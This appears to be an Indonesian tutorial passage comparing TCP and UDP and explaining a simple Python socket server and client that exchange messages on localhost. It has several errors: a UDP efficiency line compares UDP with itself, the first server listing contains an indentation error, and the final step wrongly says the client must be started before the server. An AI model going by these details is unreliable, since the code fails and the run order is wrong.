- Desain : connection-oriented.
- Transmisi Data : Terjadi dalam urutan tertentu. Paket data tiba dalam urutan yang diinginkan di penerima.
- Kecepatan : Lebih lambat dari UDP.
- Efisiensi : Kurang efisien dibandingkan dengan UDP.
- Retransmisi : Dimungkinkan untuk mengirim ulang data dalam TCP jika ada paket yang hilang dalam proses transmisi.
- Jaminan Pengiriman : TCP menjamin pengiriman data ke penerima/router tujuan.
- Urutan Data : TCP mampu mengurutkan data. Ini mengatur ulang paket data dalam urutan tertentu.
- Ukuran Header : 20 bytes.
- Broadcasting : Tidak support broadcasting.
- Metode Transfer : TCP membaca data menggunakan sistem byte. Setiap pesan ditransmisikan ke batas segmen.
- Reliability(Keandalan)* : TCP menjamin pengiriman data ke rute tujuan dan menawarkan dukungan untuk pengecekan kesalahan. Lebih dapat diandalkan dibandingkan dengan protokol UDP.
- Acknowledgment segments : Punya.
- Handshake Protocol : TCP menggunakan three-way handshake untuk membangun koneksi seperti SYN-ACK, SYN, ACK, dll.
- Contoh Penggunaan : Transver Services, POP, SMTP, FTP, HTTP, HTTPS, dll
UDP
- Definisi : UDP mirip dengan protokol TCP. Tapi itu tidak menjamin pemulihan data dan layanan pengecekan kesalahan. Jika menggunakan protokol ini, data akan terus dikirim, terlepas dari masalah apa pun dengan penerima.
- Desain : connectionless.
- Transmisi Data : Tidak terjadi.
- Kecepatan : Lebih cepat dari TCP.
- Efisiensi : Lebih efisien dibandingkan dengan UDP.
- Retransmisi : Tidak dimungkinkan untuk mengirim ulang data.
- Jaminan Pengiriman : Tidak menjamin pengiriman data ke penerima/router tujuan.
- Urutan Data : UDP tidak mampu mengurutkan data. Tidak memiliki urutan tetap, dan semua paket tetap independen satu sama lain.
- Ukuran Header : 8 bytes.
- Broadcasting : Support broadcasting.
- Metode Transfer : Paket UDP memiliki batasan yang ditentukan. Ia mengirimkan setiap paket satu per satu dan memeriksa integritas data pada saat kedatangannya.
- Reliability(Keandalan)* : TUDP menawarkan dukungan hanya untuk pemeriksaan kesalahan dasar menggunakan blok data checksum.
- Acknowledgment segments : Tidak unya.
- Handshake Protocol : Tidak ada karena sonnectionless.
- Contoh Penggunaan : Streaming Service, Video Stream, VOIP, DNS, dll

Mari Kita Coba

Untuk flow koneksinya seperti berikut.

TCPServer.py

import socket

# Inisialisasi pemuatan soket dan menunggu koneksi


server_Socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

#mengset soket ke alamat lokal,
#Isiannya sepasang yaitu (host,host harus diisi alamat lokal yaitu localhost atau 127.0,0,1
server_Socket.bind(('localhost', 12000))

#mengaktifkan server untuk menerima koneksi.
#Argumen backlog harus di isi minimal0 (jika lebih rendah, akan diset ke 0);
server_Socket.listen(5)

while True:
    print("Server menunggu koneksi")

    #Terima koneksi.
     #Soket harus dii-bind ke sebuah alamat dan listening koneksi.
    #Return value nya adalah sepasang (conn, address) di mana conn adalah objek
    #soketang dapat digunakan untuk mengirim dan menerima data pada sambungan,
    #dan address adalah alamat yang tke soket di ujung sambungan lainnya.
    client_Socket,addr = server_Socket.accept()


    # memulai mendengarkan  TCP request yang akan datang
    print("koneksi klien dari ",addr)
    while True:
        data = client_Socket.recv(1024)
            if not data or data.decode('utf-8') == 'END':
            break
        print("menerima dari client : ",data.decode("utf-8"))
        try:
            client_Socket.send(bytes('HEy client','utf-8'))
        except:
            print("Keluar")
    client_Socket.close()
server_Socket.close()

Penjelasan TCPServer

import socket

# Inisialisasi pemuatan soket dan menunggu koneksi


server_Socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

#mengset soket ke alamat lokal,
#Isiannya sepasang yaitu (host,host harus diisi alamat lokal yaitu localhost atau 127.0,0,1
server_Socket.bind(('localhost', 12000))

#mengaktifkan server untuk menerima koneksi.
#Argumen backlog harus di isi minimal0 (jika lebih rendah, akan diset ke 0);
server_Socket.listen(5)

Dalam socket programming, pertama yang hrus kita lakkan adalah import module socket. kemudian kita membuat variabel dengan nama server_socket yang isinya kita memanggil addresFamily socket.AF_INET dan jenis soketnya yaitu socket.SOCK_STREAM.

Kemudian kita harus melakukan binding dengan menggunakan method bind. method ini digunakan untukmengset soket ke alamat lokal. Diisi dengan sepasang alamat IP dan port. Kmudian kita akan mengaktifkan server dengan menggunakan function listen(), parameter yang di isi harus lebih besar sama dengan 0. Parameter tersebut digunakan untuk menentukan jumlah koneksi yang tidak diterima yang akan diizinkan oleh sistem sebelum menolak koneksi baru.

while True:
       print("Server menunggu koneksi")

       #Terima koneksi.
       #Soket harus dii-bind ke sebuah alamat dan listening koneksi.
       #Return value nya adalah sepasang (conn, address) di mana conn adalah objek
       #soketang dapat digunakan untuk mengirim dan menerima data pada sambungan,
       #dan address adalah alamat yang tke soket di ujung sambungan lainnya.
       client_Socket,addr = server_Socket.accept()


       # memulai mendengarkan  TCP request yang akan datang
       print("koneksi klien dari ",addr)
       while True:
           data = client_Socket.recv(1024)
           if not data or data.decode('utf-8') == 'END':
               break
           print("menerima dari client : ",data.decode("utf-8"))
           try:
               client_Socket.send(bytes('HEy client','utf-8'))
           except:
               print("Keluar")
       client_Socket.close()
   server_Socket.close()

Masuk ke fase menunggu koneksi. Kita menggunakan infinite-loop. Dalam menerima koneksi (accept()), Soket harus di-bind ke sebuah alamat dan listening koneksi. Return value nya adalah sepasang (conn, address) di mana conn adalah objek soket baru yang dapat digunakan untuk mengirim dan menerima data pada sambungan, dan address adalah alamat yang terikat ke soket diujung sambungan lainnya.

Ketika koneksi ter-establish maka akan print alamat dari client. kemudian kita perlu men-decode payload yang di kirim dan diprint. Ketika koniksi awal ter-establish maka server juga akan mengirim sebuah payload berupa string yang isinya HEy client.

TCPClient.py

import socket

client_Socket = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
#Hubungkan soket ke remote address.
#Untuk soket IP, alamatnya sepasang (host, port).
client_Socket.connect(('localhost',12000))
payload = 'Halo Serperr' #Payload yang dikirim ke server
try:
   while True:
       client_Socket.send(payload.encode('utf-8')) #mengirim data string ke socket
       data = client_Socket.recv(1024) #Menerima hingga 1024 bytes dari socket
       print(str(data))
       more = input('Mau kirim data lagi?y/n ')
       if more.lower() == 'y':
           payload = input('Masukkan payload yang akan dikirim : ')
       else:
           print ("stop")
           break
except KeyboardInterrupt:
   print("Keluar")
client_Socket.close()

Penjelasan TCPClient

import socket

client_Socket = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
#Hubungkan soket ke remote address.
    #Untuk soket IP, alamatnya sepasang (host, port).
client_Socket.connect(('localhost',12000))
payload = 'Halo Serperr' #Payload yang dikirim ke server

Sama seperti server pertama-tama kita perlu megimport module dan mendeklarasikan sebuah variabel yang isinya socket.socket(socket.AF_INET,socket.SOCK_STREAM) dan setelah itu kita menggunakan method connect untuk membangun koneksi dengan parameter berisi alamat(ip, dan port). kita juka membuat payload berupa string, yang mana ketika koneksi antara client dan server terbangun maka payload tersebut nantinya akan terkirimkan.

try:
    while True:
        client_Socket.send(payload.encode('utf-8')) #mengirim data string ke socket
        data = client_Socket.recv(1024) #Menerima hingga 1024 bytes dari socket
        print(str(data))
         more = input('Mau kirim data lagi?y/n ')
        if more.lower() == 'y':
            payload = input('Masukkan payload yang akan dikirim : ')
        else:
            print ("stop")
            break
except KeyboardInterrupt:
    print("Keluar")
client_Socket.close()

Kita menggunakan infinite-loop pada fase koneksi dimana client bisa memilih untuk mengirimkan payload lain atau tidak. Ketika client memilih tidak untuk mengirim payload lain maka koneksi akan terputus. Walaupun koneksi terputus, Server akan tetap menyala menunggu koneksi selanjutnya.

Hasil

Dalam menjalankan programnya kita harus memulainya dengan TCPClient.py terlebih dahulu. Jika tidak maka akan muncul error sebagai berikut: